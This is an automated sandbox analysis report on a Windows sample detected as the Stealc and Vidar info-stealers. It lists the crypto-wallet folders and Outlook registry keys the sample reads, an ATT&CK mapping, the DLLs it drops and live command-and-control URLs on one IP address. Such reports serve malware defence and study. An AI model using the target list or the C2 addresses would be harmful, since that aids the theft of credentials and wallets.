Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2074330924.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	50%	ReversingLabs	Win32.Trojan.Generic
file.exe	54%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dllr	100%	Avira URL Cloud	malware
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll1	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/	18%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.php37	100%	Avira URL Cloud	malware
http://185.215.113.37	18%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/nss3.dll	21%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/nss3.dllr	17%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/mozglue.dll	21%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/softokn3.dll-	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpm	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpyl;	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpl	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpch	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phption:	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	21%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.phpm	17%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php.dll	17%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/softokn3.dll	21%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.php_	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpl	17%	Virustotal		Browse
http://185.215.113.37/$5	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	21%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.phpK	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php_	17%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37u	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dllM	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpK	17%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	17%	Virustotal		Browse
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	21%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.php	19%	Virustotal		Browse
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php/	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	21%	Virustotal		Browse
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllC	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php7	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Virustotal		Browse
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe
http://185.215.113.37/C5	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php/	18%	Virustotal		Browse
http://185.215.113.37/e2b1563c6670f193.phpwser	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php7	17%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/0d60be0de163924d/freebl3.dll1	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	CBGCAFII.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllr	file.exe, 00000000.00000002.2301973505.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	CBGCAFIIECBFIDHIJKFB.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php37	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpyl;	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll-	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpm	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpl	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpch	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php_	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2329060749.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/$5	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpK	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	CBGCAFII.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.37u	file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllM	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	CBGCAFII.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php/	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllC	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php7	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.37/C5	file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.2301973505.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	CBGCAFII.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520049
Start date and time:	2024-09-27 04:13:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
